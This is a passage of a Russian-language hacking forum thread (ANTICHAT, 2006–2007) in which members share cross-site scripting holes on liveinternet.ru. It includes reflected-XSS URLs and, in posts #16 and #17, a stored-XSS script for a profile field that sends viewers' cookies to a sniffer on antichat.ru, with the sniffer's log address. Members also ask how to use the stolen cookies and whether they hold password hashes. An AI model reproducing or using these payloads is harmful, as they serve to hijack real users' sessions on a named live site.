ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 28.12.2006, 19:55
Noman
Участник форума
Регистрация: 10.10.2006
Сообщений: 127
С нами: 10307370

Репутация: 31
По умолчанию

Не совсем понял за что "-", но больше вопросов подобного плана задавать не буду. Единственно хотелось бы узнать, что я нарушил.

во-первых посмотри название темы, то что ты написал не относится сюда.Есть вопрос, ищи, если такая тема есть, прочти, если нету, создай в соответствующем разделе и спроси.Разе непонятно почему "-"?Тоже самое относится и другому товарищу.Еще вопросы?С вами был m0nzt3r

Последний раз редактировалось m0nzt3r; 28.12.2006 в 20:09..
 
Ответить с цитированием

  #12  
Старый 13.01.2007, 22:22
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
С нами: 10483586

Репутация: 1223


По умолчанию

если не ошибаюсь пасивный xxs это тот каторый уже прикрыли, так зачем выкладывать его
если не прав объясните что значит пасивный.

пассивная, это когда жертва должна зайти по ссылке, которую ты дашь, чтоб хсс подействовала.Понятно?Мало флейми, устал посты стирать твои.. (m0nzt3r)

Последний раз редактировалось m0nzt3r; 14.01.2007 в 20:03..
 
Ответить с цитированием

  #13  
Старый 27.02.2007, 22:03
re-arranged
Новичок
Регистрация: 17.11.2006
Сообщений: 3
С нами: 10252586

Репутация: 0
По умолчанию

ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.
 
Ответить с цитированием

  #14  
Старый 27.02.2007, 23:08
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Цитата:
Сообщение от *D1VER  
http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!
Это другой серв....
__________________
 
Ответить с цитированием

  #15  
Старый 27.02.2007, 23:28
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

2 re-arranged

http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=7 29772&userownid=undefined"><script>alert("xss")</script>

пассивная
 
Ответить с цитированием

  #16  
Старый 01.03.2007, 00:39
DeadFire
Новичок
Регистрация: 05.05.2006
Сообщений: 5
С нами: 10535097

Репутация: 0
По умолчанию

Цитата:
Сообщение от InferNo23  
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.

А что дальше делать?

Куки отправляются на снифф общий? если да, то я не могу найти его лог =/

Зы: или это уже вообще не катит?


Цитата:
Сообщение от re-arranged  
ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.
+1 =)

Последний раз редактировалось DeadFire; 01.03.2007 в 00:43..
 
Ответить с цитированием

  #17  
Старый 01.03.2007, 06:18
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами: 10358246

Репутация: 378
По умолчанию

Не прикрыли ничего, http://www.liveinternet.ru/users/nokia1/profile/ алерт есть..
2DeadFire лог теперь на old.antichat.ru
Код:
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Log: http://old.antichat.ru/sniff/log.php
 
Ответить с цитированием

  #18  
Старый 03.03.2007, 15:44
DeadFire
Новичок
Регистрация: 05.05.2006
Сообщений: 5
С нами: 10535097

Репутация: 0
По умолчанию

Объясните плз для тупых что нужно сделать по шагам.

Зы: там скрипты отсеиваются

Зыы: я создал юзера (Vasssssia) в поле краткая инфа запихал скрипт, ну собсно и в основную тоже, на сниф вообще ниче не приходит..
приходит, когда просто в дневник пихаешь "картинку", только толку от этого как от быка молока...

Зыыы: за лог спасибо

Последний раз редактировалось DeadFire; 03.03.2007 в 15:53..
 
Ответить с цитированием

  #19  
Старый 08.03.2007, 23:02
re-arranged
Новичок
Регистрация: 17.11.2006
Сообщений: 3
С нами: 10252586

Репутация: 0
По умолчанию

2InferNo23 тысяча чертей, отсеиваются <script> </script>.
 
Ответить с цитированием

  #20  
Старый 25.07.2007, 23:59
LeopardSS
Познающий
Регистрация: 08.01.2006
Сообщений: 90
С нами: 10704254

Репутация: 16
По умолчанию

я не любитель создавать темы изза небольших вопросов, поэтому спрошу тут. В куках лиру хранится чистый мд5 или соль?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Веб-уязвимости 519 23.09.2021 11:44
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
XSS worms Xex Статьи 0 02.10.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.